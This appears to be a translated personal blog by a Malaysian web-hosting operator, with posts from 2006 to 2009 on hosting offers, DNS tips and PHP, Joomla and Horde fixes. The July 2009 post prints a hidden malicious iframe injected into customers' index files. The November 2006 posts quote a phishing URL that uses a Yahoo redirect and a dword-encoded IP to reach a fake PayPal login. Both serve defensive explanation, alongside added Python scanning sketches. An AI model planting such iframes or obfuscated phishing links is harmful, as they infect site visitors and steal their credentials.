WWW
November 18, 2009
Feel free to browse my new photoshoot gallery at http://matnet.my
July 24, 2009
As Salam to all,
New Promotion:
5 GB space
60GB Bandwidth
Park/Addon Domain allowed
Unlimited MYSQL, email, ftp , subdomain
CPANEL control panel
Fantastico.
+ FREE domain .com.my net.my org.my
Interested? Buzz me on YM: matnet80
July 15, 2009
In the last 2 weeks I got 2 issues regarding this matter.
The scenario:
All index* files were edited to redirect to a malicious website using an iframe.
Example:
<iframe src="http://u9k.ru:8080/index.php" width=151 height=125 style="visibility: hidden">
After investigation:
1. The file owner is the current user, not nobody or others.
2. The files were uploaded by the user with valid access authentication.
3. All index* files in the user's www were edited.
4. Only the current user was infected.
How:
The FTP password was hacked.
There are 2 reasons how the password was hacked:
1. Adobe Acrobat Vulnerability
I checked the PDF file with another online service called Wepawet and it identified the malicious code and the exploited vulnerability. Here is the report. This virus makes use of a known vulnerability of Adobe Acrobat (Reader) CVE-2008-2992: “Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument“.
If you are still using Acrobat Reader 8.1.2 or older, upgrade ASAP. The current version is 9.1.
This PDF file silently downloads a malicious binary (Windows executable) file from litehitscar .cn, which resides on the same server with hyperliteautoservices .cn (IP 94 .247 .3 .151).
quote from - http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/
2. FileZilla Vulnerability.
How to clean up :
1. Start with your own computer. Scan it with anti-virus and anti-spyware tools.
2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
3. Now keep the new passwords secure. Don’t use auto-upload features of your web site editors. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible.
4. Now remove the malicious code (the iframes) from your files on server. The easiest way to do it is upload a clean content from a backup.
5. Scan your server directories for any new/suspicious files (don’t forget to check hidden files). Remove anything that should not be there.
6. If your site was flagged by Google, request a malware review via Webmaster Tools.
7. Regularly check your site with diagnostics tools of your choice (my Unmask Parasites can be one of them) to be sure your site is clean.
8. Regularly update third party software in your PC.
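A sketch of the server-side check from steps 4 and 5, as an added example that is not part of the original post: it walks a web root, opens every index* file and reports hidden iframes that load from a host you do not own. The function names, the `own_hosts` parameter and the sample page are assumptions made for illustration; the last iframe in the sample is the one quoted in the post.

```python
import re
from pathlib import Path
from urllib.parse import urlsplit

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Markers of an iframe the visitor is not meant to see.
HIDDEN_RE = re.compile(
    r"""visibility\s*:\s*hidden|display\s*:\s*none|\b(?:width|height)\s*=\s*["']?[01]\b""",
    re.IGNORECASE,
)

# Constructed sample page; only the last iframe matches the injected pattern.
SAMPLE_INDEX = (
    '<html><body><h1>Welcome</h1>\n'
    '<iframe src="/banner.html" style="display:none"></iframe>\n'
    '<iframe src="http://maps.example.org/embed" width=400 height=300></iframe>\n'
    '<iframe src="http://u9k.ru:8080/index.php" width=151 height=125 '
    'style="visibility: hidden"></iframe>\n'
    '</body></html>\n'
)

def suspicious_iframes(html, own_hosts):
    """Return src URLs of hidden iframes that load from a host outside own_hosts."""
    hits = []
    for tag in IFRAME_RE.findall(html):
        src = SRC_RE.search(tag)
        if not src or not HIDDEN_RE.search(tag):
            continue  # no src, or a visible frame: not the injected pattern
        host = urlsplit(src.group(1)).hostname  # None for relative URLs
        if host and host not in own_hosts:
            hits.append(src.group(1))
    return hits

def scan_webroot(root, own_hosts):
    """Map each index* file under root to the suspicious iframe URLs found in it."""
    findings = {}
    for path in sorted(Path(root).rglob("index*")):
        if path.is_file():
            hits = suspicious_iframes(path.read_text(errors="replace"), own_hosts)
            if hits:
                findings[str(path)] = hits
    return findings

if __name__ == "__main__":
    print(suspicious_iframes(SAMPLE_INDEX, {"example.com"}))
```

Run `scan_webroot` against each account's www directory with that account's own domains in `own_hosts`; files it reports are the ones to restore from a clean backup.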
April 13, 2009
April 6, 2009
Celcom broadband doesn't work well with Streamyx DNS servers even though both are owned by TM.
Not only that, my dedicated server (in an IDC owned by TM) is also not recognized by Celcom broadband DNS.
To all my customers using Celcom broadband: please use these DNS settings.
208.67.222.222 and 208.67.220.220

Click below for detailed instructions
1. XP - https://www.opendns.com/start/device/windows-xp
2. Vista - https://www.opendns.com/start/device/windows-vista
3. 2000/NT - https://www.opendns.com/start/device/windows-2000_windows_NT
4. Ubuntu - https://www.opendns.com/start/device/ubuntu
5. Nokia S60 - https://www.opendns.com/start/device/nokia-s60
February 12, 2009
Salam.
Actually, I was only offering this promotion within kedahonline, but now I am opening it to the public.
1000MB Web Space
20GB Bandwidth
Unlimited Subdomain
Unlimited Email Accounts
Support PHP,MYSQL,CGI etc.
CPANEL Control Panel
Wordpress Installed
Server at TM IDC Netmyne Malaysia
Just RM80 per year
If interested, please contact me, Matnet, via YM/email at matnet80@yahoo.com
or call directly at +60125513251
or order at:
http://cyberiahosting.net/bill/whmcs/cart.php
February 5, 2009
HSDPA 2 bar = GPRS 4 bar
April 19, 2007
Yes, I very often receive questions that are incomplete, and sometimes that makes me too lazy to bother answering. Somehow tonight I suddenly feel extra diligent, and a bit like scolding and rambling too, so I went ahead and answered the questions asked on the kedahonline.net FORUM.
For privacy and ethical reasons, the askers' nicknames have been kept secret.
Watch... roll montage...
******* wrote:
Salam, friends,
how do I set PHP register_global=off on our website so that our PHP server is secure?
I hope someone can help.
Thanks in advance
Matnet answers:
If we have access to the server in question, as eclipsecutelady said, we can edit the PHP configuration by editing its php.ini file. But I think that by default in the PHP configuration this is already off anyway.
If the server is not ours and we are only renting hosting on it, and we want to customise PHP configuration values, for example to turn off register_globals, we can put the directive below in the .htaccess file in public_html:
php_flag register_globals off
That's all, thanks.
******** wrote:
one more problem... I want to upload and install a component but I can't...
I upload file.zip, then click upload & install, then a "problem loading" message comes up.
Then I tried the install from directory method... when I click upload... an error message appears... 'Installation file not found'
pls help... thank you in advance
Matnet answers:
OK, since this question came out of nowhere, without explaining what you want to do or what you are currently doing, and suddenly you want to install a component, I am forced to make a few guessed answers to the question above.
Guessed answer, first edition: if the component is an electronic component.
To install it there are several ways: you can use a soldering iron, a PCB, etching tools such as acid for soaking, a pen for drawing the circuit, and several sizes of drill bit for drilling the PCB.
First, you need to draw the circuit on the PCB to your taste; you can refer to books such as 1001circuits to copy the circuit you want.
Second, dip the PCB in the acid and remove the unwanted copper from the PCB.
Third, drill the holes into which the components we want to install will be inserted.
Fourth, insert the components you want to install.
Fifth, take the soldering iron and solder as neatly as possible. If you can, don't make it too thin or too thick; this may reduce your marks when your Living Skills teacher checks your work.
Sixth, voilà, you have successfully installed your electronic COMPONENTS.
------------------------------
Answer, second version - if it is a Joomla or Mambo component
1. First, are you sure the permissions on the components folder make it writeable?
2. If so, check how big your component file in zip form is. Usually the default PHP configuration sets file uploads to a maximum of 2MB only. If your file is bigger than that, then no way :)
3. Check who owns your components folder. If it is not yours, then there is also no way for you to install the component.
4. Also check whether your component is a recognised one. Maybe the component itself is broken? Try other components and see.
5. If you still have this problem, I suggest you upload your component manually and install it manually. How? Easy, just watch this video tutorial.
http://www.mambodemo.com/joomla_1.0/install_a_component_manually.html
That's all, and I hope that after this you can ask questions that are better formed and easy for anyone to answer.. anyway, thank you for the server info you PMed to me. Oops, before I forget: if safe_mode is ON, then JOOMLA will indeed face all sorts of problems... especially with components.
Wassalam.
December 22, 2006
My server had problems logging into Horde after the update to 10.9.0-R57. Customers would get to the Horde login page (http://example.com:2095/horde/login.php) successfully, but the login would silently fail when they clicked the Log in button - the page would just reload with no error messages, PHP errors, etc.
I tried to fix it with mysqlcheck -r horde but was not successful. But I saw something showing that horde_sessionhandler was not there. Then I dumped in this SQL to fix it:
CREATE TABLE horde_sessionhandler (
session_id VARCHAR(32) NOT NULL,
session_lastmodified INT NOT NULL,
session_data LONGBLOB,
PRIMARY KEY (session_id)
) ENGINE = InnoDB;
GRANT SELECT, INSERT, UPDATE, DELETE ON horde_sessionhandler TO horde@localhost;
Problem solved.
December 10, 2006
Ahaha.. I just updated my MySpace profile?? Voilà, it's such a miracle after 4-5 years of never updating
lol --> http://myspace.com/matnet
November 14, 2006
I tried to look up "dword" on Google and the only result was this:
Definitions of dword on the Web:
Double word. A data element that is 2 words, 4 bytes, or 32 bits in size.
www.ti.com/sc/docs/products/msp/intrface/usb/terms.htm
Before this I had posted about a phishing technique that used a dword to encode the real IP in the URL. So now I'll discuss how 66.117.217.154 translates to 1115019674.
From the definition on Google, a dword is 4 bytes or 32 bits, and of course IPv4 is 32 bits, so the definition fits. But how is the IP translated to a plain decimal number?
OK, now let's take a look at our first octet:
Note: 0x is the prefix for hex, 0b is the prefix for binary
Decimal value : 66
Binary value : 0b1000010
Hex value : 0x42
Second octet:
Decimal value : 117
Binary value : 0b1110101
Hex value : 0x75
Third octet:
Decimal value : 217
Binary value : 0b11011001
Hex value : 0xd9
Fourth octet:
Decimal value : 154
Binary value : 0b10011010
Hex value : 0x9a
OK, now let's take a look at the hex values.
66.117.217.154 will be 0x42.0x75.0xd9.0x9a
so, joining the four bytes in order,
0x42.0x75.0xd9.0x9a = 0x4275d99a
Now translate the hex value to decimal and we get:
0x4275d99a = 1115019674
That's all.
P.S.:
- Feel free to access my blog using this dword - http://3393926802
- I'm using this calculator for all the calculations: http://www.microcontroller.com/Embedded.asp?did=92
November 13, 2006
Today, I got a phishing email using a Yahoo redirection. People who claim redirection isn’t a problem read on. Indeed, the URL also uses Dword encoding to further make the URL obfuscated. Here’s the URL:
http://rds.yahoo.com/_ylt=A0LaSV66fNtDg.kAUoJXNyoA;_ylu=X3oDMTE2ZHVuZ3E3BGNvbG8DdwRsA1dTMQRwb3MDMwRzZWMDc3IEdnRpZANGNjU1Xzc1/SIG=148vsd1jp/EXP=1138544186/**http%3a//1115019674/www.paypal.com/us/webscr.php?cmd=_login-run
Notice the Dword there? 1115019674 That translates to 66.117.217.154
How someone could ever figure out what that URL was without clicking on it who wasn’t already familiar with phishing schemes, I’ll never know. Phishing is partly social engineering, and my trust in Yahoo is what makes me think, “Sure, I believe that Yahoo could theoretically have some arrangement with other companies to redirect traffic.” The fact that mega companies with known brands have these holes makes this a big problem.
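To show what a mail filter or an analyst can do with such a link without clicking it, here is an added example (not code from the original posts) that covers both the dword arithmetic of the November 14 post and the redirect in this one: it pulls the embedded URL out of the part after `/**`, then decodes a host written as a single decimal or hex number back to a dotted quad. The function names are assumptions, and the sample URL is a constructed, shortened form of the link above with the Yahoo tracking segment replaced by a placeholder.

```python
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Constructed, shortened form of the link in the post: the Yahoo tracking
# segment is a placeholder, the part after "/**" is unchanged.
SAMPLE_URL = ("http://rds.yahoo.com/_ylt=PLACEHOLDER/**"
              "http%3a//1115019674/www.paypal.com/us/webscr.php?cmd=_login-run")

def ip_to_dword(dotted):
    """66.117.217.154 -> 0x4275d99a -> 1115019674 (octets packed high byte first)."""
    return int(ipaddress.IPv4Address(dotted))

def dword_host_to_ip(host):
    """Return the dotted quad for a host written as one decimal or 0x-hex number, else None."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", host):
        value = int(host, 16)
    elif re.fullmatch(r"[1-9][0-9]*", host):
        value = int(host)
    else:
        return None  # ordinary hostname or dotted form
    try:
        return str(ipaddress.IPv4Address(value))
    except ipaddress.AddressValueError:  # does not fit in 32 bits
        return None

def redirect_target(url):
    """Return the percent-decoded URL embedded after '/**', or None if there is none."""
    _, marker, tail = url.partition("/**")
    return unquote(tail) if marker else None

def analyse(url):
    """Report where a link really leads and whether its host is a disguised IP."""
    target = redirect_target(url) or url
    host = urlsplit(target).hostname or ""
    return {"target": target, "host": host, "decoded_ip": dword_host_to_ip(host)}

if __name__ == "__main__":
    print(analyse(SAMPLE_URL))
```

A non-empty `decoded_ip` is a strong signal on its own: legitimate sites have no reason to address themselves by a bare 32-bit number, and here the brand name only appears in the path.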